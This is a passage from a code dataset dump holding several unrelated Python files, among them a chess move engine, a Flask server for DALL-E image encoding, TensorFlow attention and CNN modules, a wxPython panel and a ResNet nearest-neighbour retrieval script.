utils.sentence_tokenized_to_vector(sentence_tokenized[0:tokenID], words)\n training.append([\n vector,\n label\n ])\n\n #training = sorted(training, key=lambda x: (len(x[0]) - x[0].count(0)))\n\n #Shuffle all words vectors and its labels\n random.shuffle(training)\n training = np.array(training)\n train_x = list(training[:,0])\n train_y = list(training[:,1])\n\n #Debug\n '''\n print(len(training_input), len(training_input[0]), \"train_x\", training_input)\n print('')\n print(len(labels), len(labels[0]), \"train_y\", labels)\n exit()\n '''\n\n tf.reset_default_graph()\n model = utils.set_model(len(words), len(utils.associations))\n\n #Remove old logs if exists\n if os.path.isdir('build_logs'):\n shutil.rmtree('build_logs')\n\n #Start training\n model.fit(\n train_x,\n train_y,\n n_epoch=utils.config['fit']['n_epoch'],\n batch_size=utils.config['fit']['batch_size'],\n show_metric=True)\n\n #Save trained network\n if os.path.isdir('model'):\n shutil.rmtree('model')\n model.save('model/model.tflearn')\n\n #Add words and labels to model as json file for classification\n with open('model/train_data.json', 'w') as file:\n train_data = {\n 'words': words,\n 'labels': labels\n }\n file.write(json.dumps(train_data))\n\nif __name__ == \"__main__\":\n train()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"262235026","text":"\"\"\"\nDefinitions of each of the different chess pieces.\n\"\"\"\n\nfrom abc import ABC, abstractmethod\n\nfrom chessington.engine.data import Player, Square\n\n\nclass Piece(ABC):\n \"\"\"\n An abstract base class from which all pieces inherit.\n \"\"\"\n\n def __init__(self, player):\n self.player = player\n self.has_moved = False\n\n @abstractmethod\n def get_available_moves(self, board):\n \"\"\"\n Get all squares that the piece is allowed to move to.\n \"\"\"\n pass\n\n def move_to(self, board, new_square):\n \"\"\"\n Move this piece to the given square on the board.\n \"\"\"\n current_square = board.find_piece(self)\n board.move_piece(current_square, new_square)\n\n def position(self, board):\n return board.find_piece(self)\n\n def direction(self):\n return {Player.WHITE: 1, Player.BLACK: -1}[self.player]\n\n def steps(self, board, move, limit):\n if limit:\n move_limit = 1\n elif not limit:\n move_limit = 7\n current_square = self.position(board)\n moves = []\n step = {'forward_step': [1, 0], 'backward_step': [-1, 0], 'left_step': [0, -1], 'right_step': [0, 1], \\\n 'forward_left_diagonal': [1, -1], 'forward_right_diagonal': [1, 1], 'backward_left_diagonal': [-1, -1], \\\n 'backward_right_diagonal': [-1, 1]}\n xy = step[move]\n for i in range(1, move_limit + 1):\n next_square = Square.at(current_square.row + (self.direction() * i * xy[0]),\n current_square.col + (self.direction() * i * xy[1]))\n if board.in_board(next_square):\n if board.square_is_empty(next_square):\n moves.append(next_square)\n elif board.has_enemy(next_square):\n moves.append(next_square)\n break\n elif board.has_friend(next_square):\n break\n return moves\n\n\nclass Pawn(Piece):\n \"\"\"\n A class representing a chess pawn.\n \"\"\"\n\n def get_available_moves(self, board):\n moves = []\n forward_step = self.steps(board, 'forward_step', limit=True)[0]\n if not board.has_enemy(forward_step):\n moves.append(forward_step)\n current_square = self.position(board)\n start_row = {Player.WHITE: 1, Player.BLACK: 6}[self.player]\n if current_square.row == start_row:\n double_step = Square.at(current_square.row + (2 * self.direction()), current_square.col)\n if board.square_is_empty(double_step):\n moves.append(double_step)\n moves += self.attackable_squares(board, current_square)\n return moves\n\n def attackable_squares(self, board, current_square):\n left_diagonal = Square.at(current_square.row + self.direction(), current_square.col - 1)\n left_en_passant = Square.at(current_square.row, current_square.col - 1)\n right_diagonal = Square.at(current_square.row + self.direction(), current_square.col + 1)\n right_en_passant = Square.at(current_square.row, current_square.col + 1)\n attack_moves = []\n if board.has_enemy(left_diagonal) or board.en_passant == left_en_passant:\n attack_moves.append(left_diagonal)\n if board.has_enemy(right_diagonal) or board.en_passant == right_en_passant:\n attack_moves.append(right_diagonal)\n return attack_moves\n\n\nclass Knight(Piece):\n \"\"\"\n A class representing a chess knight.\n \"\"\"\n\n def get_available_moves(self, board):\n current_square = self.position(board)\n moves = [\n Square.at(current_square.row + 2, current_square.col - 1),\n Square.at(current_square.row + 2, current_square.col + 1),\n Square.at(current_square.row - 2, current_square.col - 1),\n Square.at(current_square.row - 2, current_square.col + 1),\n Square.at(current_square.row + 1, current_square.col - 2),\n Square.at(current_square.row - 1, current_square.col - 2),\n Square.at(current_square.row + 1, current_square.col + 2),\n Square.at(current_square.row - 1, current_square.col + 2)\n ]\n valid_moves = []\n for move in moves:\n if board.in_board(move):\n valid_moves.append(move)\n return valid_moves\n\n\nclass Bishop(Piece):\n \"\"\"\n A class representing a chess bishop.\n \"\"\"\n\n def get_available_moves(self, board):\n moves = self.steps(board, 'forward_left_diagonal', limit=False) + self.steps(board, 'forward_right_diagonal',\n limit=False) \\\n + self.steps(board, 'backward_left_diagonal', limit=False) + self.steps(board,\n 'backward_right_diagonal',\n limit=False)\n return moves\n\n\nclass Rook(Piece):\n \"\"\"\n A class representing a chess rook.\n \"\"\"\n\n def get_available_moves(self, board):\n moves = self.steps(board, 'forward_step', limit=False) + self.steps(board, 'backward_step', limit=False) \\\n + self.steps(board, 'left_step', limit=False) + self.steps(board, 'right_step', limit=False)\n return moves\n\n def castling(self, board, castling):\n current_square = self.position(board)\n if castling == 'left':\n if self.has_moved == False:\n board.move_piece(current_square, Square.at(current_square.row, current_square.col + 2))\n elif castling == 'right':\n if self.has_moved == False:\n board.move_piece(current_square, Square.at(current_square.row, current_square.col - 2))\n\n\nclass Queen(Piece):\n \"\"\"\n A class representing a chess queen.\n \"\"\"\n\n def get_available_moves(self, board):\n moves = self.steps(board, 'forward_step', limit=False) + self.steps(board, 'backward_step', limit=False) \\\n + self.steps(board, 'left_step', limit=False) + self.steps(board, 'right_step', limit=False) \\\n + self.steps(board, 'forward_left_diagonal', limit=False) + self.steps(board, 'forward_right_diagonal',\n limit=False) \\\n + self.steps(board, 'backward_left_diagonal', limit=False) + self.steps(board,\n 'backward_right_diagonal',\n limit=False)\n return moves\n\n\nclass King(Piece):\n \"\"\"\n A class representing a chess king.\n \"\"\"\n\n def get_available_moves(self, board):\n moves = self.steps(board, 'forward_step', limit=True) + self.steps(board, 'backward_step', limit=True) \\\n + self.steps(board, 'left_step', limit=True) + self.steps(board, 'right_step', limit=True) \\\n + self.steps(board, 'forward_left_diagonal', limit=True) + self.steps(board, 'forward_right_diagonal',\n limit=True) \\\n + self.steps(board, 'backward_left_diagonal', limit=True) + self.steps(board, 'backward_right_diagonal',\n limit=True)\n if self.has_moved == False:\n current_square = self.position(board)\n left_squares = [Square.at(current_square.row, current_square.col - 3),\n Square.at(current_square.row, current_square.col - 2), \\\n Square.at(current_square.row, current_square.col - 1),\n Square.at(current_square.row, current_square.col + 1), \\\n Square.at(current_square.row, current_square.col + 2)]\n right_squares = [Square.at(current_square.row, current_square.col + 1),\n Square.at(current_square.row, current_square.col + 2)]\n empty = True\n for square in left_squares:\n if not board.square_is_empty(square):\n empty = False\n if empty:\n moves.append(Square.at(current_square.row, current_square.col - 2))\n empty = True\n for square in right_squares:\n if not board.square_is_empty(square):\n empty = False\n if empty:\n moves.append(Square.at(current_square.row, current_square.col + 2))\n\n return moves\n","sub_path":"chessington/engine/pieces.py","file_name":"pieces.py","file_ext":"py","file_size_in_byte":8739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"521358771","text":"import io\nimport os, sys\nimport requests\nimport PIL\nimport numpy as np\n\nimport torch\nimport torch.nn.functional as F\nimport torchvision.transforms as T\nimport torchvision.transforms.functional as TF\n\nfrom dall_e import map_pixels, unmap_pixels, load_model\n\ndef download_image(url):\n resp = requests.get(url)\n resp.raise_for_status()\n return PIL.Image.open(io.BytesIO(resp.content))\n\ndef preprocess(img, target_size):\n s = min(img.size)\n\n if s < target_size:\n raise ValueError(f'min dim for image {s} < {target_size}')\n\n r = target_size / s\n s = (round(r * img.size[1]), round(r * img.size[0]))\n # img = TF.resize(img, s, interpolation=PIL.Image.LANCZOS)\n img = TF.resize(img, s, interpolation=TF.InterpolationMode.LANCZOS)\n img = TF.center_crop(img, output_size=2 * [target_size])\n img = torch.unsqueeze(T.ToTensor()(img), 0)\n return map_pixels(img)\n\ndev = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nprint(\"Loading models...\")\nenc = load_model(\"./dall-e/encoder.pkl\", dev)\ndec = load_model(\"./dall-e/decoder.pkl\", dev)\n\nfrom flask import Flask, request, send_file, send_from_directory, jsonify\nimport json \nfrom waitress import serve\n\napp = Flask('app')\n\n# Uncomment these two lines to enable CORS headers for all routes:\n# from flask_cors import CORS\n# CORS(app) \n\ndef serve_pil_image(pil_img):\n img_io = io.BytesIO()\n pil_img.save(img_io, 'JPEG', quality=70)\n img_io.seek(0)\n return send_file(img_io, mimetype='image/jpeg')\n\n@app.route('/', methods=[\"GET\"])\ndef home():\n return send_from_directory(\".\", \"index.html\")\n\n@app.route('/encode-decode/', methods=[\"POST\"])\ndef encode_decode(size):\n with torch.no_grad(): # https://github.com/pytorch/pytorch/issues/16417#issuecomment-566654504\n data = request.files['file']\n x = preprocess(PIL.Image.open(data), int(size))\n z_logits = enc(x.to(dev))\n z = torch.argmax(z_logits, axis=1)\n z = F.one_hot(z, num_classes=enc.vocab_size).permute(0, 3, 1, 2).float()\n x_stats = dec(z).float()\n x_rec = unmap_pixels(torch.sigmoid(x_stats[:, :3]))\n x_rec = T.ToPILImage(mode='RGB')(x_rec[0])\n return serve_pil_image(x_rec)\n\n@app.route('/encode/', methods=[\"POST\"])\ndef encode(size):\n data = request.files['file']\n x = preprocess(PIL.Image.open(data), int(size))\n z_logits = enc(x.to(dev))\n z = torch.argmax(z_logits, axis=1)\n return jsonify(z.cpu().numpy().tolist())\n\n@app.route('/decode', methods=[\"POST\"])\ndef decode():\n z = request.get_json(force=True)\n z = np.array(z)\n z = torch.from_numpy(z).to(dev)\n z = F.one_hot(z, num_classes=enc.vocab_size).permute(0, 3, 1, 2).float()\n x_stats = dec(z).float()\n x_rec = unmap_pixels(torch.sigmoid(x_stats[:, :3]))\n x_rec = T.ToPILImage(mode='RGB')(x_rec[0])\n return serve_pil_image(x_rec)\n\nprint(\"Server started.\")\nserve(app, host=\"0.0.0.0\", port=8080)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"320913755","text":"'''\nCreated on Jul 26, 2014\n\n@author: ANBU\n'''\n\nclass Employee:\n empCount = 0\n empList = []\n\n def __init__(self, eid, name):\n print(\"Employee Object Initiated\")\n self.eid = eid\n self.name = name\n Employee.empCount += 10\n \n \n def addEmployee(self, employee):\n Employee.empList.append(employee)\n \n def displayAll(self):\n for empdet in Employee.empList:\n print(empdet.eid)\n print(empdet.name)\n def __del__(self):\n print(\"Employee Object Destroyed\")\n\nif __name__ == '__main__':\n \n emp = Employee(1, \"Kalaiarasan\")\n print(Employee.empCount)\n pass\n","sub_path":"PythonWorkspace/FirstPgm/org/srm/kalai/ClassObjectsSample.py","file_name":"ClassObjectsSample.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"131891213","text":"import tensorflow as tf\nimport numpy as np\nimport math\n\nclass Position_Encoder(object):\n def __init__(self, emb_size, max_len=5000):\n self.emb_size = emb_size\n self.max_len = max_len\n pe = np.zeros([max_len, emb_size], np.float32)\n position = np.expand_dims(np.arange(0, max_len), 1).astype(np.float32)\n div_term = np.exp(np.arange(0 ,emb_size, 2).astype(np.float32) * -(math.log(10000.0) / emb_size))\n pe[:, 0::2] = np.sin(position * div_term)\n pe[:, 1::2] = np.cos(position * div_term)\n pe = np.expand_dims(pe, 1)\n self.pe = tf.Variable(pe, trainable=False)\n\n def __call__(self, inputs, seq_length):\n with tf.variable_scope('position_encoder'):\n embs = tf.transpose(inputs, [1, 0, 2])\n max_time = tf.shape(embs)[0]\n batch_size = tf.shape(embs)[1]\n embs = embs * tf.sqrt(float(self.emb_size))\n embs_ta = tf.TensorArray(dtype=tf.float32, size=max_time)\n embs_ta = embs_ta.unstack(embs)\n output_ta = tf.TensorArray(dtype=tf.float32, dynamic_size=True, size=0)\n t0 = tf.constant(0, dtype=tf.int32)\n f0 = tf.zeros([batch_size], dtype=tf.bool)\n mask = tf.expand_dims(tf.cast(tf.sequence_mask(seq_length), tf.float32), -1)\n def loop_fn(t, output_ta, f):\n cur_emb = embs_ta.read(t)\n output = tf.concat([cur_emb, tf.tile(self.pe[t], [batch_size, 1])], -1)\n output_ta = output_ta.write(t, output)\n f = tf.greater_equal(t + 1, seq_length)\n return t + 1, output_ta, f\n\n _, output_ta, _ = tf.while_loop(\n cond=lambda _1, _2, f: tf.logical_not(tf.reduce_all(f)),\n body=loop_fn,\n loop_vars=(t0, output_ta, f0)\n )\n embs = tf.transpose(output_ta.stack(), [1, 0, 2])\n embs *= mask\n return embs\n\n\nclass Cnn_extractor(object):\n def __init__(self, hidden_dim):\n self.hidden_dim = hidden_dim\n self.sw0 = tf.layers.Conv1D(self.hidden_dim, 1, padding='same')\n self.bn0 = tf.layers.BatchNormalization()\n self.sw1 = tf.layers.Conv1D(self.hidden_dim, 1, padding='same')\n self.bn1 = tf.layers.BatchNormalization()\n self.sw2 = tf.layers.Conv1D(self.hidden_dim, 2, padding='same')\n self.bn2 = tf.layers.BatchNormalization()\n self.sw2_2 = tf.layers.Conv1D(self.hidden_dim, 2, padding='same')\n self.bn2_2 = tf.layers.BatchNormalization()\n self.sw3 = tf.layers.Conv1D(self.hidden_dim, 3, padding='same')\n self.bn3 = tf.layers.BatchNormalization()\n self.sw3_2 = tf.layers.Conv1D(self.hidden_dim, 3, padding='same')\n self.bn3_2 = tf.layers.BatchNormalization()\n self.sw3_3 = tf.layers.Conv1D(self.hidden_dim, 3, padding='same')\n self.bn3_3 = tf.layers.BatchNormalization()\n\n def __call__(self, input):\n with tf.variable_scope('cnn_extractor'):\n input = self.sw0(input)\n input = tf.nn.selu(input)\n input = self.bn0(input)\n sw1 = self.sw1(input)\n sw1 = tf.nn.selu(sw1)\n sw1 = self.bn1(sw1)\n sw2 = self.sw2(input)\n sw2 = tf.nn.selu(sw2)\n sw2 = self.bn2(sw2)\n sw2 = self.sw2_2(sw2)\n sw2 = tf.nn.selu(sw2)\n sw2 = self.bn2_2(sw2)\n sw3 = self.sw3(input)\n sw3 = tf.nn.selu(sw3)\n sw3 = self.bn3(sw3)\n sw3 = self.sw3_2(sw3)\n sw3 = tf.nn.selu(sw3)\n sw3 = self.bn3_2(sw3)\n sw3 = self.sw3_3(sw3)\n sw3 = tf.nn.selu(sw3)\n sw3 = self.bn3_3(sw3)\n \n cnn_output = tf.concat([sw1, sw2, sw3], -1)\n cnn_output = tf.layers.dense(cnn_output, self.hidden_dim, activation=tf.nn.selu)\n return tf.nn.dropout(cnn_output, keep_prob=0.5)\n\n\nclass Attention(object):\n def __init__(self, hidden_dim, num_tags):\n super(Attention, self).__init__()\n self.hidden_dim = hidden_dim\n self.num_tags = num_tags\n\n self.attn_dense = tf.layers.Dense(self.hidden_dim, use_bias=False,\n kernel_initializer=tf.contrib.layers.xavier_initializer())\n self.attn_linear = tf.layers.Dense(self.hidden_dim, use_bias=True, activation=tf.nn.tanh,\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\n bias_initializer=tf.zeros_initializer())\n self.__init_embs()\n\n def __init_embs(self):\n with tf.variable_scope('tag_embedding'):\n self._tag_embeddings = tf.get_variable(name='_tag_embeddings', shape=[self.num_tags, 25], dtype=tf.float32)\n\n\n def __call__(self, input, sequence_lengths):\n with tf.variable_scope('attention'):\n tag_embeddings = tf.nn.embedding_lookup(params=self._tag_embeddings,\n ids=tf.constant(list(range(self.num_tags)), dtype=tf.int32),\n name='tag_embeddings')\n query = tf.transpose(input, [1, 0, 2])\n max_time = tf.shape(query)[0]\n batch_size = tf.shape(query)[1]\n context = tf.tile(tf.expand_dims(tag_embeddings, 0),\n [batch_size, 1, 1])\n query_ta = tf.TensorArray(dtype=tf.float32, size=max_time)\n query_ta = query_ta.unstack(query)\n attn_ta = tf.TensorArray(dtype=tf.float32, dynamic_size=True, size=0)\n output_ta = tf.TensorArray(dtype=tf.float32, dynamic_size=True, size=0)\n t0 = tf.constant(0, dtype=tf.int32)\n f0 = tf.zeros([batch_size], dtype=tf.bool)\n\n def loop_fn(t, attn_ta, output_ta, f):\n cur_q = query_ta.read(t)\n gamma_h = self.attn_dense(context)\n gamma_h = tf.squeeze(tf.matmul(gamma_h, tf.expand_dims(cur_q, -1)), -1)\n weights = tf.nn.softmax(gamma_h, -1)\n c_t = tf.squeeze(tf.matmul(tf.expand_dims(weights, 1), context), 1)\n output = self.attn_linear(tf.concat([c_t, cur_q], -1))\n attn_ta = attn_ta.write(t, gamma_h)\n output_ta = output_ta.write(t, output)\n f = tf.greater_equal(t + 1, sequence_lengths)\n return t + 1, attn_ta, output_ta, f\n\n _, attn_ta, output_ta, _ = tf.while_loop(\n cond=lambda _1, _2, _3, f: tf.logical_not(tf.reduce_all(f)),\n body=loop_fn,\n loop_vars=(t0, attn_ta, output_ta, f0)\n )\n self.attn_cnn_outputs = tf.transpose(output_ta.stack(), [1, 0, 2])\n attn_weights = tf.transpose(attn_ta.stack(), [1, 0, 2])\n return attn_weights, self.attn_cnn_outputs\n","sub_path":"model/NCRFSAC/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":6917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"488855083","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 3 14:40:43 2018\r\n\r\n@author: lenovo\r\n\"\"\"\r\n\r\na,b=3,True\r\nprint(b)\r\nscore=80\r\ntwo=100\r\nif score>80 and two==100:\r\n print(\"phone\")\r\nelse:\r\n print(\"no pay\")\r\n \r\n \r\nif 1>2:\r\n print(\"1\")\r\nelif 2>3:\r\n print(\"2\")\r\nelse:\r\n print(\"3\")\r\n \r\n \r\n#0-60:不及格;60-70:及格;70-90:良;90-100:优秀\r\nfenshu=99\r\nif fenshu>=90:\r\n print(\"优秀\")\r\nelif fenshu>=70:\r\n print(\"良好\")\r\nelif fenshu>=60:\r\n print(\"及格\")\r\nelse:\r\n print(\"不及格\")\r\n\r\n#while+break=if\r\nwhile 1>0:\r\n print(\"1\")\r\n break\r\n\r\n\r\nls=['当山峰没有棱角的时候','当河水不再流','当时间停住日夜不分','当天地万物化为虚有']\r\nfor i in ls:\r\n print(i)\r\n \r\n\r\nfor i in range(1,10):\r\n print(i)\r\nfor i in range(20,10,-3):\r\n print(i)\r\n\r\nyesterday='2016-06-03'\r\nyesterday.index('-')\r\nnian=yesterday[0:4]\r\nyesterday[5:7]\r\nyesterday[8:10]\r\nnian\r\nyesterday.split('-')\r\nfenge=yesterday.split('-')\r\nfor i in fenge:\r\n print(i)\r\nprint('a,b,c'.split())\r\nprint('a\\tb\\tc'.split())\r\n\r\ni=123456\r\ndef test():\r\n global j\r\n j=0\r\n print(j)\r\ntest()\r\nprint(j)\r\n\r\n\r\ndef sum1(a,b):\r\n return (int(a)+int(b))\r\nwhile True:\r\n a=input(\"请输入第一个数:\")\r\n b=input(\"请输入第二个数:\")\r\n sum0=sum1(a,b)\r\n print(\"和是:\"+str(sum0))\r\n break\r\n\r\n\r\n#保存文件\r\nopen('state.txt','w').write('1')\r\n#读文件\r\na=open('state.txt','r').readline()\r\nif a=='0':\r\n print('菜单是:')\r\nelse:\r\n print('欢迎第一次使用,请登记你的名字!')\r\n print('菜单是:')","sub_path":"day2_下午练习.py","file_name":"day2_下午练习.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"357071578","text":"#!/usr/bin/python\nimport wx\nclass CONTROL_BUTTONS:\n\tdef __init__(self,RightPanel,event_handler):\n\t\ttmpPanel = wx.Panel(RightPanel,wx.ID_ANY)\n\t\ttmpPanel.SetBackgroundColour('#FFFFFF')\n\t\ttmplayout = wx.BoxSizer(wx.HORIZONTAL)\n\t\tbutton_generate = wx.Button(tmpPanel,989,\"Generate CODE!\")\n\t\tbutton_close = wx.Button(tmpPanel,999,\"Close\")\n\t\tbutton_generate.Bind(wx.EVT_BUTTON,event_handler)\n\t\tbutton_close .Bind(wx.EVT_BUTTON,event_handler)\n\t\ttmplayout.Add(button_generate,flag=wx.ALL|wx.ALIGN_RIGHT,border=5)\n\t\ttmplayout.Add(button_close ,flag=wx.ALL|wx.ALIGN_RIGHT,border=5)\n\t\ttmpPanel.SetSizer(tmplayout)\n\t\tbutton_generate.Disable()\n\t\tself.panel=tmpPanel\n\t\tself.button_generate=button_generate\n","sub_path":"store/gui/control_buttons.py","file_name":"control_buttons.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"183518567","text":"from sqlalchemy import Column, PrimaryKeyConstraint\nfrom sqlalchemy.dialects.postgresql import VARCHAR, INTEGER\n\nfrom .database import Base\n\nclass CourseCorequisite(Base):\n __tablename__ = 'course_corequisite'\n\n department = Column(VARCHAR(length=255))\n level = Column(INTEGER)\n corequisite = Column(VARCHAR(length=255))\n\n __table_args__ = (\n PrimaryKeyConstraint('department', 'level', 'corequisite'),\n )","sub_path":"src/api/tables/course_corequisite.py","file_name":"course_corequisite.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"404780588","text":"# Created by Krasimir Vatchinsky - KGV Consulting Corp - info@kgvconsultingcorp.com\n# This program help to compare inputed results from 3 sources, \n# if 2 results matched - are equal, print the result, if non result match discard all\n\n# set a Flag\nvalidResult = None\n\n# create empty list\ninputs = []\n\n# try/except method to catch non numerical value and rise and error warning the user\ntry:\n # loop to get 3 computer inputs\n for i in range(3):\n inputs.append( int( input('Enter computer ' + str(i + 1) + ' timed result: ') ) )\n\n# exception when the user input is non numerical entry rise an exception and warn to enter only numbers\nexcept Exception as e:\n print(\"Oops, something went wrong. Please enter only whole numerical format!\")\n\n# using for loop and booleon to iterate throughout the list with stored inputs\n# and check if there are at least two same timed results inputs, if they are print them as result \n# if no than print Discard results and close\nfor inputValue in inputs:\n if inputs.count(inputValue) > 1:\n validResult = inputValue\n\nif validResult is not None:\n print(\"Result is \" + str(validResult))\nelse:\n print(\"Discard results\")\n","sub_path":"compareInputs.py","file_name":"compareInputs.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"198217942","text":"##########################################\nimport os\nimport numpy as np\nfrom numpy.linalg import norm\nfrom numpy import shape\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom PIL import Image\nimport pandas as pd\nfrom random import randint\nimport json\nimport random\nfrom tiny_imagenet_loader_final_results import tinyImageNetDataset\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import models\n##########################################\n# controls for the program\n# 0 for not blue waters, 1 for blue waters\nblue_waters = 0\n\n#choose the epoch model that you want to get the results from \nepoch_num = 12\n\nval_batch_size = 5\n##########################################\n# load things from training\n#TODO: dataframe misses the first entry in the annotations text file\nif blue_waters:\n src_dir = '/mnt/c/scratch/training/tra392/hw5/src'\n\nelse:\n src_dir = 'C:/home/classes/IE534_DL/hw5/src'\n\ntrain_data_dir = 'data/tiny-imagenet-200/train'\nval_data_dir = 'data/tiny-imagenet-200/val'\ntrain_annotations_path = os.path.join(src_dir, 'img_df.csv')\nval_annotations_path = os.path.join(src_dir, 'data/tiny-imagenet-200/val/val_annotations.txt')\nbackup_dir = os.path.join(src_dir, 'backup_resnet18')\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nif str(device) == 'cuda':\n print('cuda -> Using GPU powerrrrrrr')\nelse:\n print('lame, cpu...')\n\nval_transform =transforms.Compose([\n transforms.Resize(224),\n transforms.ToTensor()])\n\nval_dataset = tinyImageNetDataset(src_dir = src_dir, data_dir = val_data_dir, annotations_path = val_annotations_path, train = False, final_results = True,transform = val_transform)\n\n##########################################\n''' final results in words (took about 3 hours to modify the code and get the images looking decent)\n- done - sample 5 different images from validation set (each from a different class)\n- show top 10 ranked results (i.e. lowest Euclidean distance)\n- show the Euclidean distance between query image and ranked images\n- show bottom 10 ranked results (i.e. highest Euclidean distance)\n- describe at least one way you can improve the network performance (training speed, accuracy, etc.)\n-- be super descriptive, there is a possible answer in the paper you can use if you understand it\n'''\n\ndef final_results(epoch):\n # load data (the if is just so i can fold the code)\n load_data = 1\n if load_data:\n epoch_num = 'epoch_' + str(epoch)\n save_path = os.path.join(backup_dir, epoch_num)\n\n # load model\n model_fn = 'epoch_' + str(epoch) + '_resnet.ckpt'\n model_path = os.path.join(save_path, model_fn)\n\n #TODO: change for real dataset\n #model = models.resnet50().to('cuda')\n model = models.resnet18().to('cuda')\n model = torch.nn.Sequential(*(list(model.children())[:-1]))\n state_dict = torch.load(model_path)\n model.load_state_dict(state_dict)\n\n # load query image classes and paths\n # img_class_data = [class_name (str), img_fp (str)]\n class_buffer_fn = 'epoch_' + str(epoch) + '_class_buffer.txt'\n class_path = os.path.join(save_path, class_buffer_fn)\n with open(class_path, 'r') as f:\n img_class_data = json.load(f)\n\n #TODO: naming scheme doesn't transfer well between blue waters and my computer...\n classes = []\n paths_old = []\n paths = []\n for i in range(len(img_class_data)):\n classes.append(img_class_data[i][0])\n paths_old.append(img_class_data[i][1])\n\n src_dir_old = '/mnt/c/scratch/training/tra392/hw5/src'\n src_dir_new = 'C:/home/classes/IE534_DL/hw5/src'\n\n for i in paths_old:\n x = i.replace(src_dir_old, src_dir_new)\n paths.append(x)\n classes = np.array(classes)\n paths = np.array(paths)\n # load query image maps as tensors\n # q_maps[i, :] = feature maps corresponding to \n # image in classes[i]\n all_maps_fn = 'epoch_' + str(epoch) + '_all_maps.txt'\n all_maps_path = os.path.join(save_path, all_maps_fn)\n with open(all_maps_path, 'rb') as f:\n q_maps = torch.load(f)\n q_maps = q_maps.detach().numpy().squeeze()\n\n print('Data for epoch {} loaded'.format(epoch))\n ############################################\n model.eval()\n k = len(q_maps) # number of neighbors\n with torch.no_grad():\n print('\\n------------Final Results------------\\n')\n # q_maps[i, :] = feature maps corresponding to image in classes[i]\n # classes[i]\n # paths[i] \n knn_model = KNeighborsClassifier()\n knn_model.fit(q_maps, classes)\n \n # find results\n # with a batch size of 5, run only once to get required images from batch size\n # uses a modified version of the data loader, so that sucks for simplicity lol\n idx = np.arange(0, len(val_dataset))\n random.shuffle(idx)\n rand_idx = idx[0:5]\n figures_near = {}\n figures_far = {}\n \n # get a single validation image\n for i in rand_idx:\n data = val_dataset[i]\n img_array = np.flip(np.transpose(data[0]), 0)\n title = 'img' + str(i)\n figures_near[title] = img_array\n figures_far[title] = img_array\n\n img_tensor = data[0].unsqueeze(0)\n label = data[1]\n img_tensor = img_tensor.to(device)\n img_map = model(img_tensor)\n img_map_arr = img_map.cpu().numpy().squeeze()\n\n curr_val_map = img_map_arr.reshape([1,-1])\n dist, idx = knn_model.kneighbors(curr_val_map, n_neighbors=k)\n \n # get the 10 closest and furthers images\n idx_near = idx[:, 0:10]\n idx_far = idx[:, -10:]\n \n dist_near = dist[:, 0:10]\n dist_far = dist[:, -10:]\n \n class_near = classes[idx_near]\n class_far = classes[idx_far]\n \n paths_near = paths[idx_near]\n paths_far = paths[idx_far]\n\n # add the 10 nearest and furthest images to dicts for plotting later\n for j in range(10):\n img_near = np.flip(np.array(Image.open(paths_near[:, j][0])), 0)\n img_far = np.flip(np.array(Image.open(paths_far[:, j][0])), 0)\n\n dist_n = dist_near[:, j]\n dist_f = dist_far[:, j]\n\n figures_near[str(dist_n)] = img_near\n figures_far[str(dist_f)] = img_far\n\n plot_figures(figures_near, 5, 11)\n plot_figures(figures_far, 5, 11)\n\ndef plot_figures(figures, nrows = 1, ncols=1):\n \"\"\"Plot a dictionary of figures.\n https://stackoverflow.com/questions/11159436/multiple-figures-in-a-single-window\n Parameters\n ----------\n figures : dictionary\n ncols : number of columns of subplots wanted in the display\n nrows : number of rows of subplots wanted in the figure\n \"\"\"\n\n fig, axeslist = plt.subplots(ncols=ncols, nrows=nrows)\n for ind,title in enumerate(figures):\n axeslist.ravel()[ind].imshow(figures[title], cmap=plt.gray())\n axeslist.ravel()[ind].set_title(title,backgroundcolor = 'white', fontsize = 14.5)\n axeslist.ravel()[ind].set_axis_off()\n plt.tight_layout() # optional\n plt.show()\n\n\n\n\n\ndef plotting(show_plot, save_plot, plot_fn):\n # loss[i] = loss for epoch i\n loss_fn = 'loss.txt'\n loss_path = os.path.join(backup_dir, loss_fn)\n with open(loss_path, 'r') as f:\n loss = json.load(f) \n epochArr = np.linspace(1, num_epochs, num_epochs)\n \n ax2 = plt.subplot(212)\n #ax2.set_title('Loss vs. Epochs')\n ax2.plot(epochArr, train_loss, label = 'Loss - Training Dataset')\n ax2.set_xlabel('Epoch')\n ax2.set_ylabel('Loss')\n handles, labels = ax2.get_legend_handles_labels()\n ax2.legend(handles, labels) \n ax2.set_xticks(np.rint(epochArr))\n\n ax1 = plt.subplot(211, sharex = ax2)\n #ax1.set_title('Accuracy vs. Epochs')\n 